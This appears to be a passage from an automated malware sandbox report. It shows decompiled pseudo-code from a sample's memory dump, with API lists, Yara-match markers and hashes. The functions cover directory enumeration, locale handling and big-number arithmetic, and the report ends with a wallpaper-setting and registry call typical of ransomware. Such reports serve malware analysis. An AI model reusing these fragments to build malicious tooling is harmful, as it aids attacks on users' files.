                      								 *[fs:0x0] =  *((intOrPtr*)(_t219 - 0xc));
                      								return _t98;
                      							}
                      							_t171 = ".";
                      							_t126 = _t219 - 0x2e0;
                      							while(1) {
                      								_t204 =  *_t126;
                      								__eflags = _t204 -  *_t171;
                      								if(_t204 !=  *_t171) {
                      									break;
                      								}
                      								__eflags = _t204;
                      								if(_t204 == 0) {
                      									L13:
                      									_t127 = _t147;
                      									L15:
                      									__eflags = _t127;
                      									if(_t127 == 0) {
                      										goto L25;
                      									}
                      									_t172 = L"..";
                      									_t128 = _t219 - 0x2e0;
                      									while(1) {
                      										_t204 =  *_t128;
                      										__eflags = _t204 -  *_t172;
                      										if(_t204 !=  *_t172) {
                      											break;
                      										}
                      										__eflags = _t204;
                      										if(_t204 == 0) {
                      											L21:
                      											_t129 = _t147;
                      											L23:
                      											__eflags = _t129;
                      											if(__eflags != 0) {
                      												_push(_t172);
                      												_t204 = E00748250(_t147, _t219 - 0x8c, _t219 + 8, __eflags, E0074427F(_t147, _t219 - 0x74, _t219 - 0x2e0));
                      												E00748274(_t147, _t219 - 0xa4, _t132, _t211, __eflags);
                      												E00741EF0();
                      												E00741EF0();
                      												_t225 = _t223 - 0x18;
                      												E00747350(_t147, _t225, _t132, __eflags, _t219 + 0x20);
                      												_t223 = _t225 - 0x18;
                      												E00747350(_t147, _t223, _t204, __eflags, _t219 - 0xa4);
                      												E00747C55(_t211, _t204, __eflags);
                      												E00741EF0();
                      											}
                      											goto L25;
                      										}
                      										_t204 =  *((intOrPtr*)(_t128 + 2));
                      										_t29 =  &(_t172[2]); // 0x2e
                      										__eflags = _t204 -  *_t29;
                      										if(_t204 !=  *_t29) {
                      											break;
                      										}
                      										_t128 = _t128 + 4;
                      										_t172 =  &(_t172[4]);
                      										__eflags = _t204;
                      										if(_t204 != 0) {
                      											continue;
                      										}
                      										goto L21;
                      									}
                      									asm("sbb eax, eax");
                      									_t129 = _t128 | 0x00000001;
                      									__eflags = _t129;
                      									goto L23;
                      								}
                      								_t204 =  *((intOrPtr*)(_t126 + 2));
                      								_t26 =  &(_t171[2]); // 0x2e0000
                      								__eflags = _t204 -  *_t26;
                      								if(_t204 !=  *_t26) {
                      									break;
                      								}
                      								_t126 = _t126 + 4;
                      								_t171 =  &(_t171[4]);
                      								__eflags = _t204;
                      								if(_t204 != 0) {
                      									continue;
                      								}
                      								goto L13;
                      							}
                      							asm("sbb eax, eax");
                      							_t127 = _t126 | 0x00000001;
                      							__eflags = _t127;
                      							goto L15;
                      						}
                      						FindClose(_t215);
                      						L6:
                      						E00741FC7();
                      						E00741EF0();
                      						E00741EF0();
                      						_t98 = _t147;
                      						goto L31;
                      					}
                      					FindClose(_t215);
                      					E00741FC7();
                      					E00741EF0();
                      					E00741EF0();
                      					_t98 = 1;
                      					goto L31;
                      				}
                      				_t147 = 1;
                      				goto L6;
                      			}

                      0x00747c55
                      0x00747c55
                      0x00747c5a
                      0x00747c5f
                      0x00747c65
                      0x00747c68
                      0x00747c6b
                      0x00747c71
                      0x00747c7d
                      0x00747c8b
                      0x00747ca7
                      0x00747cac
                      0x00747cbb
                      0x00747cd8
                      0x00747cda
                      0x00747ce3
                      0x00747ceb
                      0x00747cf1
                      0x00747cf1
                      0x00747cf3
                      0x00747cfb
                      0x00747d01
                      0x00747d03
                      0x00000000
                      0x00000000
                      0x00747d09
                      0x00747d0c
                      0x00747d0f
                      0x00747d37
                      0x00747d3e
                      0x00747e2e
                      0x00747e38
                      0x00747e44
                      0x00747e57
                      0x00747e6e
                      0x00747e73
                      0x00747e83
                      0x00747e86
                      0x00747f3f
                      0x00747f42
                      0x00747f47
                      0x00000000
                      0x00747f47
                      0x00747ea4
                      0x00747eac
                      0x00747eb1
                      0x00747eb4
                      0x00747edb
                      0x00747edf
                      0x00747ee5
                      0x00747ef2
                      0x00747efb
                      0x00747f06
                      0x00747f0d
                      0x00747f39
                      0x00747f3d
                      0x00747f3d
                      0x00000000
                      0x00747f3d
                      0x00747f12
                      0x00747f1a
                      0x00747f22
                      0x00747f2a
                      0x00747f2f
                      0x00747f70
                      0x00747f73
                      0x00747f80
                      0x00747f80
                      0x00747d44
                      0x00747d49
                      0x00747d4f
                      0x00747d4f
                      0x00747d52
                      0x00747d55
                      0x00000000
                      0x00000000
                      0x00747d57
                      0x00747d5a
                      0x00747d71
                      0x00747d71
                      0x00747d7a
                      0x00747d7a
                      0x00747d7c
                      0x00000000
                      0x00000000
                      0x00747d82
                      0x00747d87
                      0x00747d8d
                      0x00747d8d
                      0x00747d90
                      0x00747d93
                      0x00000000
                      0x00000000
                      0x00747d95
                      0x00747d98
                      0x00747daf
                      0x00747daf
                      0x00747db8
                      0x00747db8
                      0x00747dba
                      0x00747dbc
                      0x00747ddc
                      0x00747de4
                      0x00747df0
                      0x00747df8
                      0x00747dfd
                      0x00747e06
                      0x00747e0b
                      0x00747e17
                      0x00747e1e
                      0x00747e29
                      0x00747e29
                      0x00000000
                      0x00747dba
                      0x00747d9a
                      0x00747d9e
                      0x00747d9e
                      0x00747da2
                      0x00000000
                      0x00000000
                      0x00747da4
                      0x00747da7
                      0x00747daa
                      0x00747dad
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00747dad
                      0x00747db3
                      0x00747db5
                      0x00747db5
                      0x00000000
                      0x00747db5
                      0x00747d5c
                      0x00747d60
                      0x00747d60
                      0x00747d64
                      0x00000000
                      0x00000000
                      0x00747d66
                      0x00747d69
                      0x00747d6c
                      0x00747d6f
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00747d6f
                      0x00747d75
                      0x00747d77
                      0x00747d77
                      0x00000000
                      0x00747d77
                      0x00747d12
                      0x00747d18
                      0x00747d1b
                      0x00747d23
                      0x00747d2b
                      0x00747d30
                      0x00000000
                      0x00747d30
                      0x00747f50
                      0x00747f59
                      0x00747f61
                      0x00747f69
                      0x00747f6e
                      0x00000000
                      0x00747f6e
                      0x00747ced
                      0x00000000

                      APIs
                      • __EH_prolog.LIBCMT ref: 00747C5A
                        • Part of subcall function 00747514: char_traits.LIBCPMT ref: 0074752F
                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00747CD2
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00747CFB
                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00747D12
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstH_prologNextchar_traits
                      • String ID:
                      • API String ID: 3260228402-0
                      • Opcode ID: 31a387378a0a41535a44069370a16c5c21836587caf01abc06351e4f76a2904c
                      • Instruction ID: aa84dfe8869fa33e11b25c52b565bb27ded19b6d2d952a5fcbd4fd35b653a489
                      • Opcode Fuzzy Hash: 31a387378a0a41535a44069370a16c5c21836587caf01abc06351e4f76a2904c
                      • Instruction Fuzzy Hash: 40918432910018DBCB19FF60DC96AED7379BF20340F94426AE906A71A1EF385F4ACB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E0078A890(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, short* _a12) {
                      				signed int _v8;
                      				int _v12;
                      				int _v16;
                      				char _v20;
                      				signed int* _v24;
                      				short* _v28;
                      				void* __ebp;
                      				signed int _t39;
                      				void* _t45;
                      				signed int* _t46;
                      				signed int _t47;
                      				short* _t48;
                      				int _t49;
                      				short* _t56;
                      				short* _t57;
                      				short* _t58;
                      				int _t66;
                      				int _t68;
                      				short* _t72;
                      				intOrPtr _t75;
                      				void* _t77;
                      				short* _t78;
                      				intOrPtr _t85;
                      				short* _t89;
                      				short* _t92;
                      				void* _t94;
                      				short** _t102;
                      				short* _t103;
                      				signed int _t105;
                      				signed short _t108;
                      				signed int _t109;
                      				void* _t110;
                      
                      				_t39 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t39 ^ _t109;
                      				_t89 = _a12;
                      				_t105 = _a4;
                      				_v28 = _a8;
                      				_v24 = E00781CE2(_t89, __ecx, __edx) + 0x50;
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				_t45 = E00781CE2(_t89, __ecx, __edx);
                      				_t99 = 0;
                      				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                      				_t92 = _t105 + 0x80;
                      				_t46 = _v24;
                      				 *_t46 = _t105;
                      				_t102 =  &(_t46[1]);
                      				 *_t102 = _t92;
                      				if(_t92 != 0 &&  *_t92 != 0) {
                      					_t85 =  *0x799fa4; // 0x17
                      					E0078A833(0, 0x799e90, _t85 - 1, _t102);
                      					_t46 = _v24;
                      					_t110 = _t110 + 0xc;
                      					_t99 = 0;
                      				}
                      				_v20 = _t99;
                      				_t47 =  *_t46;
                      				if(_t47 == 0 ||  *_t47 == _t99) {
                      					_t48 =  *_t102;
                      					__eflags = _t48;
                      					if(_t48 == 0) {
                      						L19:
                      						_v20 = 0x104;
                      						_t49 = GetUserDefaultLCID();
                      						_v12 = _t49;
                      						_v16 = _t49;
                      						goto L20;
                      					}
                      					__eflags =  *_t48 - _t99;
                      					if( *_t48 == _t99) {
                      						goto L19;
                      					}
                      					E0078A1D0(_t92, _t99,  &_v20);
                      					_pop(_t92);
                      					goto L20;
                      				} else {
                      					_t72 =  *_t102;
                      					if(_t72 == 0 ||  *_t72 == _t99) {
                      						E0078A2B6(_t92, _t99,  &_v20);
                      					} else {
                      						E0078A21B(_t92, _t99,  &_v20);
                      					}
                      					_pop(_t92);
                      					if(_v20 != 0) {
                      						_t103 = 0;
                      						__eflags = 0;
                      						goto L25;
                      					} else {
                      						_t75 =  *0x799e8c; // 0x41
                      						_t77 = E0078A833(_t99, 0x799b80, _t75 - 1, _v24);
                      						_t110 = _t110 + 0xc;
                      						if(_t77 == 0) {
                      							L20:
                      							_t103 = 0;
                      							__eflags = 0;
                      							L21:
                      							if(_v20 != 0) {
                      								L25:
                      								asm("sbb esi, esi");
                      								_t108 = E0078A6BC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
                      								_pop(_t94);
                      								__eflags = _t108;
                      								if(_t108 == 0) {
                      									goto L22;
                      								}
                      								__eflags = _t108 - 0xfde8;
                      								if(_t108 == 0xfde8) {
                      									goto L22;
                      								}
                      								__eflags = _t108 - 0xfde9;
                      								if(_t108 == 0xfde9) {
                      									goto L22;
                      								}
                      								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
                      								__eflags = _t56;
                      								if(_t56 == 0) {
                      									goto L22;
                      								}
                      								_t57 = IsValidLocale(_v16, 1);
                      								__eflags = _t57;
                      								if(_t57 == 0) {
                      									goto L22;
                      								}
                      								_t58 = _v28;
                      								__eflags = _t58;
                      								if(__eflags != 0) {
                      									 *_t58 = _t108;
                      								}
                      								E00782616(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
                      								__eflags = _t89;
                      								if(__eflags == 0) {
                      									L36:
                      									L23:
                      									return E0076FD1B(_v8 ^ _t109);
                      								}
                      								_t33 =  &(_t89[0x90]); // 0x77e3e1
                      								E00782616(_t89, _t94, _t99, _t103, _t108, __eflags, _v16, _t33, 0x55, _t103);
                      								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
                      								__eflags = _t66;
                      								if(_t66 == 0) {
                      									goto L22;
                      								}
                      								_t36 =  &(_t89[0x40]); // 0x77e341
                      								_t68 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
                      								__eflags = _t68;
                      								if(_t68 == 0) {
                      									goto L22;
                      								}
                      								_t38 =  &(_t89[0x80]); // 0x77e3c1
                      								E0077BB3C(_t38, _t108, _t38, 0x10, 0xa);
                      								goto L36;
                      							}
                      							L22:
                      							goto L23;
                      						}
                      						_t78 =  *_t102;
                      						_t103 = 0;
                      						if(_t78 == 0 ||  *_t78 == 0) {
                      							E0078A2B6(_t92, _t99,  &_v20);
                      						} else {
                      							E0078A21B(_t92, _t99,  &_v20);
                      						}
                      						_pop(_t92);
                      						goto L21;
                      					}
                      				}
                      			}

                      APIs
                        • Part of subcall function 00781CE2: GetLastError.KERNEL32(00000000,?,00775545,?,?,?,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781CE6
                        • Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D19
                        • Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D5A
                        • Part of subcall function 00781CE2: _abort.LIBCMT ref: 00781D60
                        • Part of subcall function 00781CE2: _free.LIBCMT ref: 00781D41
                        • Part of subcall function 00781CE2: SetLastError.KERNEL32(00000000,00779965,?,00768E1A,00000000,?,00000000,?,?,00768E1A), ref: 00781D4E
                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0078A99C
                      • IsValidCodePage.KERNEL32(00000000), ref: 0078A9F7
                      • IsValidLocale.KERNEL32(?,00000001), ref: 0078AA06
                      • GetLocaleInfoW.KERNEL32(?,00001001,0077E2C1,00000040,?,0077E3E1,00000055,00000000,?,?,00000055,00000000), ref: 0078AA4E
                      • GetLocaleInfoW.KERNEL32(?,00001002,0077E341,00000040), ref: 0078AA6D
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                      • String ID:
                      • API String ID: 745075371-0
                      • Opcode ID: aad4024eaaa87c467fdf411b63dcab75b3d94482e051266088f7e3d3776e5636
                      • Instruction ID: 24600cb2468504c5e960457c48728d0b5de55b8cedeabf2b572df3ec08c17b67
                      • Opcode Fuzzy Hash: aad4024eaaa87c467fdf411b63dcab75b3d94482e051266088f7e3d3776e5636
                      • Instruction Fuzzy Hash: EE517171A84219BBFB20FFA5CC45ABA73B8BF44700F05446AE914E7150E778A901CB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E0077FA50(signed int* _a4, char _a8) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int* _v80;
                      				char _v540;
                      				signed int _v544;
                      				signed int _t197;
                      				signed int _t198;
                      				intOrPtr _t200;
                      				signed int _t201;
                      				signed int _t204;
                      				signed int _t206;
                      				signed int _t208;
                      				signed int _t209;
                      				signed int _t213;
                      				signed int _t219;
                      				intOrPtr _t225;
                      				void* _t228;
                      				signed int _t230;
                      				signed int _t243;
                      				signed int _t247;
                      				signed int _t250;
                      				void* _t253;
                      				signed int _t256;
                      				signed int* _t262;
                      				signed int _t263;
                      				signed int _t264;
                      				void* _t265;
                      				intOrPtr* _t266;
                      				signed int _t267;
                      				signed int _t269;
                      				signed int _t270;
                      				signed int _t271;
                      				signed int _t272;
                      				signed int* _t274;
                      				signed int* _t278;
                      				signed int _t279;
                      				signed int _t280;
                      				intOrPtr _t282;
                      				void* _t286;
                      				signed char _t292;
                      				signed int _t295;
                      				signed int _t303;
                      				signed int _t306;
                      				signed int _t307;
                      				signed int _t309;
                      				signed int _t311;
                      				signed int _t313;
                      				intOrPtr* _t314;
                      				signed int _t318;
                      				signed int _t322;
                      				signed int* _t328;
                      				signed int _t330;
                      				signed int _t331;
                      				signed int _t333;
                      				void* _t334;
                      				signed int _t336;
                      				signed int _t338;
                      				signed int _t341;
                      				signed int _t342;
                      				signed int* _t344;
                      				signed int _t349;
                      				signed int _t351;
                      				void* _t355;
                      				signed int _t359;
                      				signed int _t360;
                      				signed int _t362;
                      				signed int* _t368;
                      				intOrPtr _t369;
                      				signed int* _t370;
                      				signed int* _t373;
                      
                      				_t262 = _a4;
                      				_t197 =  *_t262;
                      				if(_t197 != 0) {
                      					_t2 =  &_a8; // 0x78e567
                      					_t328 =  *_t2;
                      					_t267 =  *_t328;
                      					__eflags = _t267;
                      					if(_t267 != 0) {
                      						_t3 = _t197 - 1; // -1
                      						_t349 = _t3;
                      						_t4 = _t267 - 1; // -1
                      						_t198 = _t4;
                      						_v16 = _t349;
                      						__eflags = _t198;
                      						if(_t198 != 0) {
                      							__eflags = _t198 - _t349;
                      							if(_t198 > _t349) {
                      								L23:
                      								__eflags = 0;
                      								return 0;
                      							} else {
                      								_t46 = _t198 + 1; // 0x0
                      								_t306 = _t349 - _t198;
                      								_v60 = _t46;
                      								_t269 = _t349;
                      								__eflags = _t349 - _t306;
                      								if(_t349 < _t306) {
                      									L21:
                      									_t306 = _t306 + 1;
                      									__eflags = _t306;
                      								} else {
                      									_t368 =  &(_t262[_t349 + 1]);
                      									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                      									__eflags = _t341;
                      									while(1) {
                      										__eflags =  *_t341 -  *_t368;
                      										if( *_t341 !=  *_t368) {
                      											break;
                      										}
                      										_t269 = _t269 - 1;
                      										_t341 = _t341 - 4;
                      										_t368 = _t368 - 4;
                      										__eflags = _t269 - _t306;
                      										if(_t269 >= _t306) {
                      											continue;
                      										} else {
                      											goto L21;
                      										}
                      										goto L22;
                      									}
                      									_t52 =  &_a8; // 0x78e567
                      									_t369 =  *_t52;
                      									_t243 = _t269 - _t306;
                      									__eflags =  *((intOrPtr*)(_t369 + 4 + _t243 * 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                      									if( *((intOrPtr*)(_t369 + 4 + _t243 * 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                      										goto L21;
                      									}
                      								}
                      								L22:
                      								__eflags = _t306;
                      								if(__eflags != 0) {
                      									_t330 = _v60;
                      									_t60 =  &_a8; // 0x78e567
                      									_t200 =  *_t60;
                      									_t351 =  *(_t200 + _t330 * 4);
                      									_t201 =  *((intOrPtr*)(_t200 + _t330 * 4 - 4));
                      									_v36 = _t201;
                      									asm("bsr eax, esi");
                      									_v56 = _t351;
                      									if(__eflags == 0) {
                      										_t270 = 0x20;
                      									} else {
                      										_t270 = 0x1f - _t201;
                      									}
                      									_v40 = _t270;
                      									_v64 = 0x20 - _t270;
                      									__eflags = _t270;
                      									if(_t270 != 0) {
                      										_t292 = _v40;
                      										_v36 = _v36 << _t292;
                      										_v56 = _t351 << _t292 | _v36 >> _v64;
                      										__eflags = _t330 - 2;
                      										if(_t330 > 2) {
                      											_t76 =  &_a8; // 0x78e567
                      											_t81 =  &_v36;
                      											 *_t81 = _v36 |  *( *_t76 + _t330 * 4 - 8) >> _v64;
                      											__eflags =  *_t81;
                      										}
                      									}
                      									_v76 = 0;
                      									_t307 = _t306 + 0xffffffff;
                      									__eflags = _t307;
                      									_v32 = _t307;
                      									if(_t307 < 0) {
                      										_t331 = 0;
                      										__eflags = 0;
                      									} else {
                      										_t85 =  &(_t262[1]); // 0x4
                      										_v20 =  &(_t85[_t307]);
                      										_t206 = _t307 + _t330;
                      										_t90 = _t262 - 4; // -4
                      										_v12 = _t206;
                      										_t278 = _t90 + _t206 * 4;
                      										_v80 = _t278;
                      										do {
                      											_t95 =  &_v16; // 0x78e567
                      											__eflags = _t206 -  *_t95;
                      											if(_t206 >  *_t95) {
                      												_t207 = 0;
                      												__eflags = 0;
                      											} else {
                      												_t207 = _t278[2];
                      											}
                      											__eflags = _v40;
                      											_t311 = _t278[1];
                      											_t279 =  *_t278;
                      											_v52 = _t207;
                      											_v44 = 0;
                      											_v8 = _t207;
                      											_v24 = _t279;
                      											if(_v40 > 0) {
                      												_t318 = _v8;
                      												_t336 = _t279 >> _v64;
                      												_t230 = E00790DC0(_t311, _v40, _t318);
                      												_t279 = _v40;
                      												_t207 = _t318;
                      												_t311 = _t336 | _t230;
                      												_t359 = _v24 << _t279;
                      												__eflags = _v12 - 3;
                      												_v8 = _t318;
                      												_v24 = _t359;
                      												if(_v12 >= 3) {
                      													_t279 = _v64;
                      													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                      													__eflags = _t360;
                      													_t207 = _v8;
                      													_v24 = _t360;
                      												}
                      											}
                      											_t208 = E00790A40(_t311, _t207, _v56, 0);
                      											_v44 = _t262;
                      											_t263 = _t208;
                      											_v44 = 0;
                      											_t209 = _t311;
                      											_v8 = _t263;
                      											_v28 = _t209;
                      											_t333 = _t279;
                      											_v72 = _t263;
                      											_v68 = _t209;
                      											__eflags = _t209;
                      											if(_t209 != 0) {
                      												L40:
                      												_t264 = _t263 + 1;
                      												asm("adc eax, 0xffffffff");
                      												_t333 = _t333 + E00790840(_t264, _t209, _v56, 0);
                      												asm("adc esi, edx");
                      												_t263 = _t264 | 0xffffffff;
                      												_t209 = 0;
                      												__eflags = 0;
                      												_v44 = 0;
                      												_v8 = _t263;
                      												_v72 = _t263;
                      												_v28 = 0;
                      												_v68 = 0;
                      											} else {
                      												__eflags = _t263 - 0xffffffff;
                      												if(_t263 > 0xffffffff) {
                      													goto L40;
                      												}
                      											}
                      											__eflags = 0;
                      											if(0 <= 0) {
                      												if(0 < 0) {
                      													goto L44;
                      												} else {
                      													__eflags = _t333 - 0xffffffff;
                      													if(_t333 <= 0xffffffff) {
                      														while(1) {
                      															L44:
                      															_v8 = _v24;
                      															_t228 = E00790840(_v36, 0, _t263, _t209);
                      															__eflags = _t311 - _t333;
                      															if(__eflags < 0) {
                      																break;
                      															}
                      															if(__eflags > 0) {
                      																L47:
                      																_t209 = _v28;
                      																_t263 = _t263 + 0xffffffff;
                      																_v72 = _t263;
                      																asm("adc eax, 0xffffffff");
                      																_t333 = _t333 + _v56;
                      																__eflags = _t333;
                      																_v28 = _t209;
                      																asm("adc dword [ebp-0x28], 0x0");
                      																_v68 = _t209;
                      																if(_t333 == 0) {
                      																	__eflags = _t333 - 0xffffffff;
                      																	if(_t333 <= 0xffffffff) {
                      																		continue;
                      																	} else {
                      																	}
                      																}
                      															} else {
                      																__eflags = _t228 - _v8;
                      																if(_t228 <= _v8) {
                      																	break;
                      																} else {
                      																	goto L47;
                      																}
                      															}
                      															L51:
                      															_v8 = _t263;
                      															goto L52;
                      														}
                      														_t209 = _v28;
                      														goto L51;
                      													}
                      												}
                      											}
                      											L52:
                      											__eflags = _t209;
                      											if(_t209 != 0) {
                      												L54:
                      												_t280 = _v60;
                      												_t334 = 0;
                      												_t355 = 0;
                      												__eflags = _t280;
                      												if(_t280 != 0) {
                      													_t144 =  &_a8; // 0x78e567
                      													_t266 = _v20;
                      													_t219 =  *_t144 + 4;
                      													__eflags = _t219;
                      													_v24 = _t219;
                      													_v16 = _t280;
                      													do {
                      														_v44 =  *_t219;
                      														_t225 =  *_t266;
                      														_t286 = _t334 + _v72 * _v44;
                      														asm("adc esi, edx");
                      														_t334 = _t355;
                      														_t355 = 0;
                      														__eflags = _t225 - _t286;
                      														if(_t225 < _t286) {
                      															_t334 = _t334 + 1;
                      															asm("adc esi, esi");
                      														}
                      														 *_t266 = _t225 - _t286;
                      														_t266 = _t266 + 4;
                      														_t219 = _v24 + 4;
                      														_t164 =  &_v16;
                      														 *_t164 = _v16 - 1;
                      														__eflags =  *_t164;
                      														_v24 = _t219;
                      													} while ( *_t164 != 0);
                      													_t263 = _v8;
                      													_t280 = _v60;
                      												}
                      												__eflags = 0 - _t355;
                      												if(__eflags <= 0) {
                      													if(__eflags < 0) {
                      														L63:
                      														__eflags = _t280;
                      														if(_t280 != 0) {
                      															_t170 =  &_a8; // 0x78e567
                      															_t338 = _t280;
                      															_t314 = _v20;
                      															_t362 =  *_t170 + 4;
                      															__eflags = _t362;
                      															_t265 = 0;
                      															do {
                      																_t282 =  *_t314;
                      																_t362 = _t362 + 4;
                      																_t314 = _t314 + 4;
                      																asm("adc eax, eax");
                      																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                      																asm("adc eax, 0x0");
                      																_t265 = 0;
                      																_t338 = _t338 - 1;
                      																__eflags = _t338;
                      															} while (_t338 != 0);
                      															_t263 = _v8;
                      														}
                      														_t263 = _t263 + 0xffffffff;
                      														asm("adc dword [ebp-0x18], 0xffffffff");
                      													} else {
                      														__eflags = _v52 - _t334;
                      														if(_v52 < _t334) {
                      															goto L63;
                      														}
                      													}
                      												}
                      												_t213 = _v12 - 1;
                      												__eflags = _t213;
                      												_v16 = _t213;
                      											} else {
                      												__eflags = _t263;
                      												if(_t263 != 0) {
                      													goto L54;
                      												}
                      											}
                      											_t331 = 0 + _t263;
                      											asm("adc esi, 0x0");
                      											_v20 = _v20 - 4;
                      											_t313 = _v32 - 1;
                      											_t262 = _a4;
                      											_t278 = _v80 - 4;
                      											_t206 = _v12 - 1;
                      											_v76 = _t331;
                      											_v32 = _t313;
                      											_v80 = _t278;
                      											_v12 = _t206;
                      											__eflags = _t313;
                      										} while (_t313 >= 0);
                      									}
                      									_t190 =  &_v16; // 0x78e567
                      									_t309 =  *_t190 + 1;
                      									_t204 = _t309;
                      									__eflags = _t204 -  *_t262;
                      									if(_t204 <  *_t262) {
                      										_t274 =  &(_t262[_t204 + 1]);
                      										do {
                      											 *_t274 = 0;
                      											_t274 =  &(_t274[1]);
                      											_t204 = _t204 + 1;
                      											__eflags = _t204 -  *_t262;
                      										} while (_t204 <  *_t262);
                      									}
                      									 *_t262 = _t309;
                      									__eflags = _t309;
                      									if(_t309 != 0) {
                      										while(1) {
                      											_t271 =  *_t262;
                      											__eflags = _t262[_t271];
                      											if(_t262[_t271] != 0) {
                      												goto L78;
                      											}
                      											_t272 = _t271 + 0xffffffff;
                      											__eflags = _t272;
                      											 *_t262 = _t272;
                      											if(_t272 != 0) {
                      												continue;
                      											}
                      											goto L78;
                      										}
                      									}
                      									L78:
                      									return _t331;
                      								} else {
                      									goto L23;
                      								}
                      							}
                      						} else {
                      							_t295 = _t328[1];
                      							_v44 = _t295;
                      							__eflags = _t295 - 1;
                      							if(_t295 != 1) {
                      								__eflags = _t349;
                      								if(_t349 != 0) {
                      									_t342 = 0;
                      									_v12 = 0;
                      									_v8 = 0;
                      									_v20 = 0;
                      									__eflags = _t349 - 0xffffffff;
                      									if(_t349 != 0xffffffff) {
                      										_t25 =  &_v16; // 0x78e567
                      										_t250 =  *_t25 + 1;
                      										__eflags = _t250;
                      										_v32 = _t250;
                      										_t373 =  &(_t262[_t349 + 1]);
                      										do {
                      											_t253 = E00790A40( *_t373, _t342, _t295, 0);
                      											_v68 = _t303;
                      											_t373 = _t373 - 4;
                      											_v20 = _t262;
                      											_t342 = _t295;
                      											_t303 = 0 + _t253;
                      											asm("adc ecx, 0x0");
                      											_v12 = _t303;
                      											_t34 =  &_v32;
                      											 *_t34 = _v32 - 1;
                      											__eflags =  *_t34;
                      											_v8 = _v12;
                      											_t295 = _v44;
                      										} while ( *_t34 != 0);
                      										_t262 = _a4;
                      									}
                      									_v544 = 0;
                      									_t41 =  &(_t262[1]); // 0x4
                      									_t370 = _t41;
                      									 *_t262 = 0;
                      									E0078E796(_t370, 0x1cc,  &_v540, 0);
                      									_t247 = _v20;
                      									__eflags = 0 - _t247;
                      									 *_t370 = _t342;
                      									_t262[2] = _t247;
                      									asm("sbb ecx, ecx");
                      									__eflags =  ~0x00000000;
                      									 *_t262 = 0xbadbae;
                      									return _v12;
                      								} else {
                      									_t14 =  &(_t262[1]); // 0x4
                      									_t344 = _t14;
                      									_v544 = 0;
                      									 *_t262 = 0;
                      									E0078E796(_t344, 0x1cc,  &_v540, 0);
                      									_t256 = _t262[1];
                      									_t322 = _t256 % _v44;
                      									__eflags = 0 - _t322;
                      									 *_t344 = _t322;
                      									asm("sbb ecx, ecx");
                      									__eflags = 0;
                      									 *_t262 =  ~0x00000000;
                      									return _t256 / _v44;
                      								}
                      							} else {
                      								_t9 =  &(_t262[1]); // 0x4
                      								_v544 = _t198;
                      								 *_t262 = _t198;
                      								E0078E796(_t9, 0x1cc,  &_v540, _t198);
                      								__eflags = 0;
                      								return _t262[1];
                      							}
                      						}
                      					} else {
                      						__eflags = 0;
                      						return 0;
                      					}
                      				} else {
                      					return _t197;
                      				}
                      			}

                      Instruction addresses for the decompiled function above: 0x0077fa5c to 0x0077fefd (the per-line address column that sits beside the C-code in the report lost its alignment with the code lines in extraction and is not reproduced here).

                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: gx$gx
                      • API String ID: 0-699144984
                      • Opcode ID: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                      • Instruction ID: 9a052681011bb6391ccadf821792fe6bc3d6c424d1b6729e6018eb16ca62d8ca
                      • Opcode Fuzzy Hash: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                      • Instruction Fuzzy Hash: 5E023C71E002199FDF24CFA9C9906ADBBF1FF88354F25826AD919E7341D734AA41CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 00758005
                        • Part of subcall function 00750AA7: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 00750AB6
